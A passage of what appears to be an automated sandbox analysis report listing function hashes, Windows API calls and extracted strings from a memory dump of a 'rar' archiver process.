                                                        • Instruction Fuzzy Hash: 0EE14D2AA18AC281EB20FB25E4505FDA3A1FB85794F845033DE6E077D6DE3CD506C7A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CMT
                                                        • API String ID: 0-2756464174
                                                        • Opcode ID: af76a2abfd72360e1299beae298c8050c5b24613a595956e44b66efbb76f8597
                                                        • Instruction ID: 0a7d983c1f38a23d2e943c649d44b02b88fae8cc838359170ee3a08b62e20c9b
                                                        • Opcode Fuzzy Hash: af76a2abfd72360e1299beae298c8050c5b24613a595956e44b66efbb76f8597
                                                        • Instruction Fuzzy Hash: 72D1B16AA186C281EB24FB25D4501BDA3A0FB85B80F844533DE6F476D5DE3CE542C3A1
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE8704
                                                          • Part of subcall function 00007FF7F7EE4E3C: GetCurrentProcess.KERNEL32(00007FF7F7EE9CC5), ref: 00007FF7F7EE4E69
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                        • String ID: *?$.
                                                        • API String ID: 2518042432-3972193922
                                                        • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                        • Instruction ID: e7363390f75ec7465e54082717c77d37bc9ed4a5172f399912144711205e195c
                                                        • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                        • Instruction Fuzzy Hash: BF51076AF14A9645EB10EFA298000BCA7A4FB44BD4BC55933DE2E57BC5EF3CD0528351
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                        • Instruction ID: 2cbfe421dd180065cb97e0614ae193529026983f72b1363c4ca16ffc58b17814
                                                        • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                        • Instruction Fuzzy Hash: FC114976B14601CAEB109FB5E4812AEB7B0FB48748F80153ADA9E93B98CF3CC145CB54
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1705453755-0
                                                        • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                        • Instruction ID: c6fd421eb11dad83ba315a0ef3f5f891ed2864a35a24cbcd86f906779ec47942
                                                        • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                        • Instruction Fuzzy Hash: 7901402672868187EB70EB15E4417EAB3A0FB84744FC00136E69D82688DF3CD606CF90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                        • API String ID: 3215553584-2617248754
                                                        • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                        • Instruction ID: 4edc86e448eba9f8075b4f93058967a19a1d2b9531e5da3f3f43cabaa27c429a
                                                        • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                        • Instruction Fuzzy Hash: C541CE7AB09B4589E700DF64E8417ED77A4EB08388F824536EE6D07B95DE3CD026C394
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Console$Mode$Handle$Readfflush
                                                        • String ID:
                                                        • API String ID: 1039280553-0
                                                        • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                        • Instruction ID: fff6e10ccbfcb7c0d69f044cd1cd1ff570d53b9e9848328021229e348e7ca37b
                                                        • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                        • Instruction Fuzzy Hash: 9521982AB1964287EB00AF25A904579A361FF89BA1FD44132EE6B03BE4DE3CD447C750
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                        • String ID:
                                                        • API String ID: 932687459-0
                                                        • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                        • Instruction ID: 91f80fbb6cdab5238e1b17463b724d7f9e0b20dfcb194d4e4a00f8858ce03f02
                                                        • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                        • Instruction Fuzzy Hash: 6281C926A0D68285FB51EB21E5843BDA390FB44B94F9C4532DA6E07BD5DF7CE44383A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: swprintf
                                                        • String ID: ;%u$x%u$xc%u
                                                        • API String ID: 233258989-2277559157
                                                        • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                        • Instruction ID: 0dbdb480e3cea235213ba97446c4ff46d913cddafa3b070fdbd7af3556c4feb4
                                                        • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                        • Instruction Fuzzy Hash: C202B12AA485C241EB24B639A1453FDA751BB42780F840173DAAF4B7E2DE3DF446C3E1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                        • String ID: rtmp%d
                                                        • API String ID: 2308737092-3303766350
                                                        • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                        • Instruction ID: 18e75554d293e33287a8dd0193ff6415f90cb3d2d24b37a0986cc864885a986e
                                                        • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                        • Instruction Fuzzy Hash: 6051822AA1858645EB30BF25E8455FEA360FF41784FC51132D92F4BADADE3CD606C3A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateEventHandle$ErrorLast
                                                        • String ID: rar -ioff
                                                        • API String ID: 4151682896-4089728129
                                                        • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                        • Instruction ID: 9ed3368902466cb8ad98963d9893fc49eb90124f23c1df05cd33a5eefa0b35aa
                                                        • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                        • Instruction Fuzzy Hash: F101282DA1AA1682FB14BB70A9542B5B391AF44715FC44432D83F46AE0CE2D604BC6E0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule
                                                        • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                        • API String ID: 667068680-1824683568
                                                        • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                        • Instruction ID: ba17e9cc5bffe794e917e32e42b5a8ea0b474e1ea9cdaee4bc8fbdd8dd1b1bc6
                                                        • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                        • Instruction Fuzzy Hash: A6F06D29A09B4682EB00AB11F9500B5A361BF49BC0BC85032DC3F07BA4EE2DE14AC360
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: +$-
                                                        • API String ID: 3215553584-2137968064
                                                        • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                        • Instruction ID: 3e56f7e6df4fad94740c51359fb896e15cbfaa4085ddc4f1393dab6a7d4f85e7
                                                        • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                        • Instruction Fuzzy Hash: BC12A62DE0858385FB24BA15A0446B8B755EB40754FCA4A33D6BB436D0DF3CE6D2C3A6
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Backup$Read$Seek$wcschr
                                                        • String ID:
                                                        • API String ID: 2092471728-0
                                                        • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                        • Instruction ID: 62c370d2acfa4fba6f45bc6995e0ec27ccf7c116bd667dc7195ebb38630bcf07
                                                        • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                        • Instruction Fuzzy Hash: D951533760874186EB20DB15E48056AB7B4FB84794F900236EBAE43BD9DF3CD546CB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
